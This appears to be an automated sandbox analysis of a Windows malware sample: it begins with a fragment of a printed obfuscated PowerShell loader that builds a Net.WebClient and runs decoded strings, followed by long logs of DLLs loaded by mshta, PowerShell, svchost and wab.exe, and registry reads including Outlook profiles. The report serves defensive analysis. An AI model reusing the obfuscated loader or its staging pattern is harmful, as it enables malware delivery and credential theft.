ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. ';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ponos.Lsi && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll			Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

